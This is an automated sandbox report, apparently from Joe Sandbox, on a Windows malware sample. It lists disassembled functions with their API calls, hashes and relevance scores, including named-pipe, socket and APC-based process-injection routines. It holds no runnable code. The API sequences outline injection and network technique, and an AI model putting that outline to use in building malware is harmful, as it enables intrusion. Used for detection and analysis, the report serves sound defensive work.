Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep_errno_flsbuf_invalid_parameter_noinfo
String ID: %s%s$*/*
API String ID: 3364845851-856325523
Opcode ID: 4d3adaf88e9e90db0637c378f7c191c0bc30314f5d8357b9e67139d4a27a59b8
Instruction ID: 63605b5fa17b5712b0a8d9a19c919faf77f239f601bac1ee5c129519c1719d8d
Opcode Fuzzy Hash: 4d3adaf88e9e90db0637c378f7c191c0bc30314f5d8357b9e67139d4a27a59b8
Instruction Fuzzy Hash: 3551DFB6B04B808AEB50DB61E8403DD73A2F798B88F504226EE8E53754DF3AC459CB00

Function 006B3B34 Relevance: 18.1, APIs: 12, Instructions: 105pipesleepfileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 006B3D34
GetTickCount.KERNEL32 ref: 006B3D40
CreateFileA.KERNEL32 ref: 006B3D6E
GetLastError.KERNEL32 ref: 006B3D7D
WaitNamedPipeA.KERNEL32 ref: 006B3D92
Sleep.KERNEL32 ref: 006B3D9F
GetTickCount.KERNEL32 ref: 006B3DA5
GetLastError.KERNEL32 ref: 006B3DBB
GetLastError.KERNEL32 ref: 006B3DD3
SetNamedPipeHandleState.KERNEL32 ref: 006B3DFE
GetLastError.KERNEL32 ref: 006B3E08
DisconnectNamedPipe.KERNEL32 ref: 006B3E82

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
String ID:
API String ID: 34948862-0
Opcode ID: 1fbeea9be532b9f33a7578d86157401c58637eb984225940b498093461a2244d
Instruction ID: 7c89f9bac7cf82102d0553bc01a02bfac9f5144ce33aeae0292d585d9bec0319
Opcode Fuzzy Hash: 1fbeea9be532b9f33a7578d86157401c58637eb984225940b498093461a2244d
Instruction Fuzzy Hash: 43418C72700B10C6FB50DF61E8587AD3367E788BA4F504226DE5A47B94DF39CA96C740

Function 006BDD50 Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 006BDD76

Part of subcall function 006BFBCC: _getptd_noexit.LIBCMT ref: 006BFBD0

_invalid_parameter_noinfo.LIBCMT ref: 006BDD82
__crtIsPackagedApp.LIBCMT ref: 006BDD93
AreFileApisANSI.KERNEL32 ref: 006BDDA2
MultiByteToWideChar.KERNEL32 ref: 006BDDC8
GetLastError.KERNEL32 ref: 006BDDD5
_dosmaperr.LIBCMT ref: 006BDDDD

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1138158220-0
Opcode ID: 45c80a8bb1a54d9da36eca88e3e5dd067c6ff5e0ef366819f7a7bb07a5a81634
Instruction ID: aa9c74984bc7eca2b23bac22dd4633dbbed32e00ea3df9582c9a198e588ad0f7
Opcode Fuzzy Hash: 45c80a8bb1a54d9da36eca88e3e5dd067c6ff5e0ef366819f7a7bb07a5a81634
Instruction Fuzzy Hash: 8F21A7B1700B4086EB64AF76D8143A9A7E3FB98FA4F14462D9E854B7A5EF3CC491C704

Function 006B5990 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 006B59BE
select.WS2_32 ref: 006B5A15
__WSAFDIsSet.WS2_32 ref: 006B5A24
__WSAFDIsSet.WS2_32 ref: 006B5A3C
GetTickCount.KERNEL32 ref: 006B5A45
gethostbyname.WS2_32 ref: 006B5A58
htons.WS2_32 ref: 006B5A70
inet_addr.WS2_32 ref: 006B5A82
sendto.WS2_32 ref: 006B5AAB

Strings

d, xrefs: 006B59CF

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
String ID: d
API String ID: 1257931466-2564639436
Opcode ID: a246aa495eb1010205a87a75c0c1794da7582316548824e43cfe3d206ef98d68
Instruction ID: 1f519b8fb2df8205e2b6da37fbae206f415c93393637773d800d081e534399b4
Opcode Fuzzy Hash: a246aa495eb1010205a87a75c0c1794da7582316548824e43cfe3d206ef98d68
Instruction Fuzzy Hash: 3B318D72215BC486EB60CF61E8847DE77A5F788B88F044126EE8E47B28DF79C595CB40

Function 03534123 Relevance: 16.6, APIs: 11, Instructions: 108COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03534155

Part of subcall function 0352F013: _getptd_noexit.LIBCMT ref: 0352F017

__doserrno.LIBCMT ref: 0353414C

Part of subcall function 0352EFA3: _getptd_noexit.LIBCMT ref: 0352EFA7

__doserrno.LIBCMT ref: 035341B2
_errno.LIBCMT ref: 035341B9
_invalid_parameter_noinfo.LIBCMT ref: 0353421D

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
String ID:
API String ID: 388111225-0
Opcode ID: f1e83107c3560ebd634bf603a2dc03616e82e6e5f746a5e0c4714b1d3544e5b9
Instruction ID: 20eefd5961d985e8b32cd9aab4f0e2af22736377079d0dffa206328c16625a93
Opcode Fuzzy Hash: f1e83107c3560ebd634bf603a2dc03616e82e6e5f746a5e0c4714b1d3544e5b9
Instruction Fuzzy Hash: 0C31D6B461C7154FD329EFA9F8822393BE0FB87220F05065DE4279B2F1D67498014791

Function 006B5884 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57networksleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 006B58A4
select.WS2_32 ref: 006B590A
__WSAFDIsSet.WS2_32 ref: 006B5919
__WSAFDIsSet.WS2_32 ref: 006B592E
send.WS2_32 ref: 006B5944
WSAGetLastError.WS2_32 ref: 006B594F
Sleep.KERNEL32 ref: 006B5961
GetTickCount.KERNEL32 ref: 006B5967

Strings

d, xrefs: 006B58B2

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: CountTick$ErrorLastSleepselectsend
String ID: d
API String ID: 2152284305-2564639436
Opcode ID: 5b27ba0d8d607714712b298a6346cf3fa52a79f11e24ee9ada0824c07ae7a3d6
Instruction ID: 21ce419018b79ce2a9376417f308cd34874856dd2e00b6bc2f3bbbd5535200a2
Opcode Fuzzy Hash: 5b27ba0d8d607714712b298a6346cf3fa52a79f11e24ee9ada0824c07ae7a3d6
Instruction Fuzzy Hash: CC216B72618BC096E7A09F21F4887DE7362F784B94F444126DB9D83B58DF39C5A88B40

Function 03534F0F Relevance: 15.1, APIs: 10, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03534F3A

Part of subcall function 0352F013: _getptd_noexit.LIBCMT ref: 0352F017

__doserrno.LIBCMT ref: 03534F32

Part of subcall function 0352EFA3: _getptd_noexit.LIBCMT ref: 0352EFA7

__lock_fhandle.LIBCMT ref: 03534F7E
_lseeki64_nolock.LIBCMT ref: 03534F97
_unlock_fhandle.LIBCMT ref: 03534FBA

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
String ID:
API String ID: 2644381645-0
Opcode ID: 3dd1f773b3794dac3aa2364f63410e61f96c4d43ad1712998e2299525dae883a
Instruction ID: 95db21b151a83f8ef07a2117551bd7b909e778c286115370bb3ce5bc9f658487
Opcode Fuzzy Hash: 3dd1f773b3794dac3aa2364f63410e61f96c4d43ad1712998e2299525dae883a
Instruction Fuzzy Hash: 8D21C171A18B554EE319EB6DF84237977A0FBC7221F49065DD01A8B3F1DBB4584182A2

Function 006AF740 Relevance: 15.1, APIs: 10, Instructions: 91sleepfilepipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 006AF761
GetLastError.KERNEL32 ref: 006AF7BB
GetTickCount.KERNEL32 ref: 006AF7C6
Sleep.KERNEL32 ref: 006AF7D6
GetLastError.KERNEL32 ref: 006AF7E3
WriteFile.KERNEL32 ref: 006AF816
WriteFile.KERNEL32 ref: 006AF845
FlushFileBuffers.KERNEL32 ref: 006AF85D
DisconnectNamedPipe.KERNEL32 ref: 006AF867
Sleep.KERNEL32 ref: 006AF87B

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
String ID:
API String ID: 3101085627-0
Opcode ID: 14ddf7d56459dce092d8b4c05f865c520464f36babfb135bd28acd5bcd2fd201
Instruction ID: fdf56ae1744de32a63de20bf0fbb3a80753df9b779d96c021b81b3545cbd8c82
Opcode Fuzzy Hash: 14ddf7d56459dce092d8b4c05f865c520464f36babfb135bd28acd5bcd2fd201
Instruction Fuzzy Hash: 35314F32B009559AEB50AFF5E4843DC33B3F745B98F510126DE0AA7A58DF39C949C781

Function 03534D97 Relevance: 15.1, APIs: 10, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03534DC2

Part of subcall function 0352F013: _getptd_noexit.LIBCMT ref: 0352F017

__doserrno.LIBCMT ref: 03534DBA

Part of subcall function 0352EFA3: _getptd_noexit.LIBCMT ref: 0352EFA7

__lock_fhandle.LIBCMT ref: 03534E06
_lseek_nolock.LIBCMT ref: 03534E1F
_unlock_fhandle.LIBCMT ref: 03534E40

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
String ID:
API String ID: 1078912150-0
Opcode ID: a44390f2c37dd677b3233f6d87f92801b3f25a181347d6d3130cc20f15b56632
Instruction ID: 0fbb5f68f50bb020efbe65374d635730d78c041ab4454d3f3ee6a3aa46d01a0d
Opcode Fuzzy Hash: a44390f2c37dd677b3233f6d87f92801b3f25a181347d6d3130cc20f15b56632
Instruction Fuzzy Hash: A021BE71A0E7114EE319FB69F88233D7BA0FBC7221F16065ED4568B2F1D7B4580286A6

Function 006C4CDC Relevance: 15.1, APIs: 10, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 006C4D0E

Part of subcall function 006BFBCC: _getptd_noexit.LIBCMT ref: 006BFBD0

__doserrno.LIBCMT ref: 006C4D05

Part of subcall function 006BFB5C: _getptd_noexit.LIBCMT ref: 006BFB60

__doserrno.LIBCMT ref: 006C4D6B
_errno.LIBCMT ref: 006C4D72
_invalid_parameter_noinfo.LIBCMT ref: 006C4DD6

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
String ID:
API String ID: 388111225-0
Opcode ID: 9f8bd50f574e5b1fba15d47533313b02c9ba4f688673664e799b398f3f09af9d
Instruction ID: c4a8c1e4037d5c0c9da6b92250c71d1827419ce19f7e7db5ef3869e0b85b22fe
Opcode Fuzzy Hash: 9f8bd50f574e5b1fba15d47533313b02c9ba4f688673664e799b398f3f09af9d
Instruction Fuzzy Hash: 5D2105B230078086D752BF75DCA1B7E3653EF807A0F55462DEA26477E2CE78D8828718

Function 006B238C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 113sleeplibraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 006B23F6
GetProcAddress.KERNEL32 ref: 006B2406

Part of subcall function 006B22A8: malloc.LIBCMT ref: 006B22E6
Part of subcall function 006B22A8: WriteProcessMemory.KERNEL32 ref: 006B2354
Part of subcall function 006B22A8: free.LIBCMT ref: 006B236A

Thread32Next.KERNEL32 ref: 006B24A2
Sleep.KERNEL32 ref: 006B24B8
ReadProcessMemory.KERNEL32 ref: 006B24D9
WriteProcessMemory.KERNEL32 ref: 006B250C

Strings

NtQueueApcThread, xrefs: 006B23FC
ntdll, xrefs: 006B23C1

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: MemoryProcess$Write$AddressHandleModuleNextProcReadSleepThread32freemalloc
String ID: NtQueueApcThread$ntdll
API String ID: 2421628550-1374908105
Opcode ID: bfb52fbe3132d43843797ddb625b63e92ee4822df1cb6bb90e03f41037cd665a
Instruction ID: 11714332a55a9d302e1b232141effbea189f3b2fdfc0f99993341fa62a254086
Opcode Fuzzy Hash: bfb52fbe3132d43843797ddb625b63e92ee4822df1cb6bb90e03f41037cd665a
Instruction Fuzzy Hash: 784137B2B01B129AEB20CB62E8503ED73E6F748788F44412ADE4D97B18EF38C595C750

Function 006CDC10 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 006CDC36
_errno.LIBCMT ref: 006CDC2B

Part of subcall function 006BFBCC: _getptd_noexit.LIBCMT ref: 006BFBD0

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1812809483-0
Opcode ID: 2db82fa7e3577a0467f99b3b756d91ff98ac30b20cd2bff14b3452a9952b3022
Instruction ID: 420d7baa6cfc68edb4c06c8093a50d4989425414d59f9c31b90e43bfa06c0547
Opcode Fuzzy Hash: 2db82fa7e3577a0467f99b3b756d91ff98ac30b20cd2bff14b3452a9952b3022
Instruction Fuzzy Hash: 7F417AB1A1439182DF20EB22C940BF977A7FB60BA4F94413EEB9547B84D778D882C704

Function 006BE1BC Relevance: 13.6, APIs: 9, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006BE1A4: _mtinitlocknum.LIBCMT ref: 006C1C5E
Part of subcall function 006BE1A4: _amsg_exit.LIBCMT ref: 006C1C6A

DecodePointer.KERNEL32 ref: 006BE218
DecodePointer.KERNEL32 ref: 006BE236
EncodePointer.KERNEL32 ref: 006BE264
DecodePointer.KERNEL32 ref: 006BE279
EncodePointer.KERNEL32 ref: 006BE284
DecodePointer.KERNEL32 ref: 006BE296
DecodePointer.KERNEL32 ref: 006BE2A6
__crtCorExitProcess.LIBCMT ref: 006BE32A
ExitProcess.KERNEL32 ref: 006BE332

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$EncodeExitProcess$__crt_amsg_exit_mtinitlocknum
String ID:
API String ID: 1550138920-0
Opcode ID: 0ef9eb6f061b4daf03fdf3e42c16e4d13342b6aff9f2cfcfd4baff68ba1b4b73
Instruction ID: 4b217255c0acd648d892a00cb0e5106c94b5a484c5656c28bf66f95f5cfed4ec
Opcode Fuzzy Hash: 0ef9eb6f061b4daf03fdf3e42c16e4d13342b6aff9f2cfcfd4baff68ba1b4b73
Instruction Fuzzy Hash: 78418C35706B8182FA949F11F8447A972A7F789BC4F54402AEA4E57B24DF3AC4A98300

Function 006B604C Relevance: 13.6, APIs: 9, Instructions: 96threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 006B6087
UpdateProcThreadAttribute.KERNEL32 ref: 006B60C7
GetLastError.KERNEL32 ref: 006B60D1
GetCurrentProcess.KERNEL32 ref: 006B6106
DuplicateHandle.KERNEL32 ref: 006B612E
GetCurrentProcess.KERNEL32 ref: 006B6147
DuplicateHandle.KERNEL32 ref: 006B616A
GetCurrentProcess.KERNEL32 ref: 006B6179
DuplicateHandle.KERNEL32 ref: 006B619D

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: CurrentDuplicateHandleProcess$ErrorLast$AttributeProcThreadUpdate
String ID:
API String ID: 570851288-0
Opcode ID: dda4d696657d8428a178a4cccd50c6335780de972918c4e264b35949d0234b26
Instruction ID: d5693d3dde17ca8ea335cf1c0f694f6a655e3f59cf631f832bef00c62802682b
Opcode Fuzzy Hash: dda4d696657d8428a178a4cccd50c6335780de972918c4e264b35949d0234b26
Instruction Fuzzy Hash: 9E419C72B15B8087EB209F66E844399B7A6F788FD8F084129EE8943B59DF7DC5458B00

Function 006B4B88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 006B4BC9
htons.WS2_32 ref: 006B4BDA
socket.WS2_32 ref: 006B4C1C
closesocket.WS2_32 ref: 006B4C31
gethostbyname.WS2_32 ref: 006B4C50
htons.WS2_32 ref: 006B4C80
ioctlsocket.WS2_32 ref: 006B4C9A
connect.WS2_32 ref: 006B4CB2
WSAGetLastError.WS2_32 ref: 006B4CBC

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
String ID:
API String ID: 3339321253-0
Opcode ID: 0621e14f71e2d88feb01d696d24d30253457c2253971658608e7fecda2256e50
Instruction ID: b0d49f5bbac7ec84a5a5e529aef9599bffa04e0027f462ba08694f2778a59ca7
Opcode Fuzzy Hash: 0621e14f71e2d88feb01d696d24d30253457c2253971658608e7fecda2256e50
Instruction Fuzzy Hash: A9312662714A8086EB24DF21F9447EE6763FB44FA8F441225DE0A47794EF3DC69ACB04

Function 0353373B Relevance: 13.6, APIs: 9, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03533766

Part of subcall function 0352F013: _getptd_noexit.LIBCMT ref: 0352F017

__doserrno.LIBCMT ref: 0353375E

Part of subcall function 0352EFA3: _getptd_noexit.LIBCMT ref: 0352EFA7

__lock_fhandle.LIBCMT ref: 035337AA
_unlock_fhandle.LIBCMT ref: 035337E4

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
String ID:
API String ID: 2464146582-0
Opcode ID: 3fa3b4e4dc5e02bebeaf5fd051b8e84fdfa837920f3ab4cfb1f7d0eadf5e2d4a
Instruction ID: cb7f93b4efc931a4a2f27492f8668a6029e98acf54b1b63c233f3b7395fbb7fe
Opcode Fuzzy Hash: 3fa3b4e4dc5e02bebeaf5fd051b8e84fdfa837920f3ab4cfb1f7d0eadf5e2d4a
Instruction Fuzzy Hash: D921C279A0D7014EE319EB6CF88233D7BE0FBC7221F15065DD4568B2F1DBA4584287A6

Function 006B5220 Relevance: 13.6, APIs: 9, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006B5268: htonl.WS2_32 ref: 006B52C5
Part of subcall function 006B5268: select.WS2_32 ref: 006B5333
Part of subcall function 006B5268: __WSAFDIsSet.WS2_32 ref: 006B534B
Part of subcall function 006B5268: accept.WS2_32 ref: 006B5368
Part of subcall function 006B5268: ioctlsocket.WS2_32 ref: 006B5380
Part of subcall function 006B5268: __WSAFDIsSet.WS2_32 ref: 006B5423

GetTickCount.KERNEL32 ref: 006B5232

Part of subcall function 006B55B4: malloc.LIBCMT ref: 006B55E6
Part of subcall function 006B55B4: htonl.WS2_32 ref: 006B5619
Part of subcall function 006B55B4: recvfrom.WS2_32 ref: 006B565D
Part of subcall function 006B55B4: WSAGetLastError.WS2_32 ref: 006B566A

GetTickCount.KERNEL32 ref: 006B524A
GetTickCount.KERNEL32 ref: 006B5768
GetTickCount.KERNEL32 ref: 006B577E
shutdown.WS2_32 ref: 006B579D
shutdown.WS2_32 ref: 006B57B2
closesocket.WS2_32 ref: 006B57BC
free.LIBCMT ref: 006B57DC
free.LIBCMT ref: 006B57F1

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
String ID:
API String ID: 3610715900-0
Opcode ID: 88e486cb06a14a5883469a77d23634fc32d297ebefc922b574edaf9e776b3f38
Instruction ID: b2dadde00ab8774c2bdfa19c4b6a2de0703c24537a85b8c47b55b1e466ff82be
Opcode Fuzzy Hash: 88e486cb06a14a5883469a77d23634fc32d297ebefc922b574edaf9e776b3f38
Instruction Fuzzy Hash: AB217CB6B00E41C6EB609F22E4483EC6366F788F84F284136CE5A8B319DF34C8E18744

Function 03532F5F Relevance: 13.6, APIs: 9, Instructions: 71COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03532F80

Part of subcall function 0352F013: _getptd_noexit.LIBCMT ref: 0352F017

__doserrno.LIBCMT ref: 03532F78

Part of subcall function 0352EFA3: _getptd_noexit.LIBCMT ref: 0352EFA7

__lock_fhandle.LIBCMT ref: 03532FC4
_close_nolock.LIBCMT ref: 03532FD7
_unlock_fhandle.LIBCMT ref: 03532FF0

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
String ID:
API String ID: 2140805544-0
Opcode ID: 0567908abb1da09094319a8f35060996f58827c2446b019697f467acd15fe284
Instruction ID: bb894d6cf78eef06329aa821e086388f3b60a511368f1afd2f9e940d23800eb0
Opcode Fuzzy Hash: 0567908abb1da09094319a8f35060996f58827c2446b019697f467acd15fe284
